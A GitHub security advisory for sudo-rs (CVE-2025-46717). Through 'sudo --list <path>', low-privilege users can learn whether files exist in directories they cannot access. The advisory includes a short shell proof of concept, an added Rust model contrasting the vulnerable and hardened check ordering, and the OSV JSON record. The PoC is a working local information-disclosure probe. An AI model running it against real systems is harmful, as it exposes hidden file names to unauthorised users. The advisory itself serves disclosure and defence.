GHSA-98CV-WQJX-WX8F

Vulnerability from github – Published: 2025-05-13 14:08 – Updated: 2025-05-13 14:08
Summary
sudo-rs Allows Low Privilege Users to Discover the Existence of Files in Inaccessible Folders
Details

Summary

Users with no (or very limited) sudo privileges can determine whether files exist in folders that they otherwise cannot access, using sudo --list <pathname>.

PoC

As root:

# mkdir /tmp/foo
# chmod a-rwx /tmp/foo
# touch /tmp/foo/secret_file

As a user without any (or limited) sudo rights:

$ sudo --list /tmp/foo/nonexistent_file
sudo-rs: '/tmp/foo/nonexistent_file': command not found
$ sudo --list /tmp/foo/secret_file
sudo-rs: Sorry, user eve may not run sudo on host.

I.e. the user can distinguish whether files exist.

Related

Original sudo (vulnerable version tested by us: 1.9.15p5) exhibited similar behaviour for files with the executable bit set.

Impact

Users with local access to a machine can discover the existence/non-existence of certain files, revealing potentially sensitive information in the file names. This information can also be used in conjunction with other attacks.
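The oracle comes from the order of two checks: the path is resolved (with root's view of the filesystem) before the policy decides whether the user may run sudo at all, so the two distinct error messages encode existence. The following model is an added illustration, not sudo-rs code and not the actual 0.2.6 patch: the filesystem, the closed directory and the sudoers policy are constructed in-memory sample data, and the hardened ordering is an assumed design that (1) refuses users without any sudoers entry before touching the path and (2) resolves the path with the invoking user's own access rights, so a file behind a directory they cannot traverse is "not found" whether or not it exists.

```rust
// Added illustrative model (not sudo-rs code): why the order of path
// resolution and policy lookup in `sudo --list <path>` turns the error
// message into a file-existence oracle, and one ordering that closes it.
use std::collections::HashSet;

/// What the invoking user gets back (modelled as an enum, not real sudo text).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Reply {
    CommandNotFound, // "'<path>': command not found"
    NotPermitted,    // "Sorry, user ... may not run sudo on host."
    Listed,          // the matching sudoers entries would be printed
}

/// A tiny stand-in for the filesystem and the sudoers policy (constructed data).
pub struct World {
    /// Files that exist on disk.
    pub files: HashSet<&'static str>,
    /// Directories the *invoking* user cannot traverse (`chmod a-rwx` in the PoC).
    pub closed_dirs: HashSet<&'static str>,
    /// Users that have at least one sudoers entry.
    pub privileged: HashSet<&'static str>,
}

impl World {
    /// Root sees every file, regardless of directory permissions.
    fn exists_as_root(&self, path: &str) -> bool {
        self.files.contains(path)
    }

    /// Does `path` lie under a directory the invoking user cannot enter?
    fn hidden_from_user(&self, path: &str) -> bool {
        self.closed_dirs
            .iter()
            .any(|d| path.starts_with(format!("{}/", d).as_str()))
    }
}

/// Vulnerable ordering: resolve the command with root's view of the
/// filesystem first, and only then ask whether the user may run sudo.
/// An unprivileged user therefore gets two different answers depending
/// on whether the file exists.
pub fn list_vulnerable(w: &World, user: &str, path: &str) -> Reply {
    if !w.exists_as_root(path) {
        return Reply::CommandNotFound;
    }
    if !w.privileged.contains(user) {
        return Reply::NotPermitted;
    }
    Reply::Listed
}

/// Hardened ordering (assumed design, not the actual sudo-rs fix):
/// 1. a user without any sudoers entry is refused before the path is touched;
/// 2. resolution uses the invoking user's own access, so anything behind a
///    directory they cannot traverse is "not found" either way.
pub fn list_hardened(w: &World, user: &str, path: &str) -> Reply {
    if !w.privileged.contains(user) {
        return Reply::NotPermitted;
    }
    if w.hidden_from_user(path) || !w.exists_as_root(path) {
        return Reply::CommandNotFound;
    }
    Reply::Listed
}

/// Oracle check: can `user` tell an existing file apart from a missing one?
pub fn leaks_existence(
    list: fn(&World, &str, &str) -> Reply,
    w: &World,
    user: &str,
    existing: &str,
    missing: &str,
) -> bool {
    list(w, user, existing) != list(w, user, missing)
}

/// The PoC scenario from the advisory: /tmp/foo is closed to everyone,
/// `eve` has no sudo rights, `alice` (hypothetical) has a limited entry.
pub fn sample_world() -> World {
    World {
        files: ["/tmp/foo/secret_file", "/usr/bin/id"].into_iter().collect(),
        closed_dirs: ["/tmp/foo"].into_iter().collect(),
        privileged: ["alice"].into_iter().collect(),
    }
}

fn main() {
    let w = sample_world();
    let (hit, miss) = ("/tmp/foo/secret_file", "/tmp/foo/nonexistent_file");
    for (name, f) in [("vulnerable", list_vulnerable as fn(&World, &str, &str) -> Reply),
                      ("hardened", list_hardened)] {
        println!(
            "{name}: eve sees {:?} vs {:?} -> leaks existence: {}",
            f(&w, "eve", hit), f(&w, "eve", miss), leaks_existence(f, &w, "eve", hit, miss)
        );
    }
}
```

The point of the model is the invariant to test for, not the messages themselves: for a caller who is not allowed to run the command, the reply must be a function of the policy decision alone and never of root-only filesystem state. A regression test in the style of `leaks_existence` (same user, one existing and one missing file behind a closed directory, outputs compared byte for byte) is the check a maintainer would keep after fixing CWE-497 issues of this kind.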

Credits

This issue was identified by sudo-rs developer Marc Schoolderman.


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.5"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "sudo-rs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46717"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-497"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-13T14:08:18Z",
    "nvd_published_at": "2025-05-12T15:16:01Z",
    "severity": "LOW"
  },
  "details": "### Summary\n\nUsers with no (or very limited) sudo privileges can determine whether files exists in folders that they otherwise cannot access using `sudo --list \u003cpathname\u003e`.\n\n### PoC\n\nAs root:\n```\n# mkdir /tmp/foo\n# chmod a-rwx /tmp/foo\n# touch /tmp/foo/secret_file\n```\nAs a user without any (or limited) sudo rights:\n```\n$ sudo --list /tmp/foo/nonexistent_file\nsudo-rs: \u0027/tmp/foo/nonexistent_file\u0027: command not found\n$ $ sudo --list /tmp/foo/secret_file\nsudo-rs: Sorry, user eve may not run sudo on host.\n```\nI.e. the user can distinguish whether files exist.\n\n### Related\nOriginal sudo (vulnerable version tested by us: 1.9.15p5) exhibited similar behaviour for files with the executable bit set.\n\n### Impact\nUsers with local access to a machine can discover the existence/non-existence of certain files, revealing potentially sensitive information in the file names. This information can also be used in conjunction with other attacks.\n\n### Credits\nThis issue was identified by sudo-rs developer Marc Schoolderman",
  "id": "GHSA-98cv-wqjx-wx8f",
  "modified": "2025-05-13T14:08:18Z",
  "published": "2025-05-13T14:08:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-98cv-wqjx-wx8f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46717"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trifectatechfoundation/sudo-rs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trifectatechfoundation/sudo-rs/releases/tag/v0.2.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "sudo-rs Allows Low Privilege Users to Discover the Existence of Files in Inaccessible Folders"
}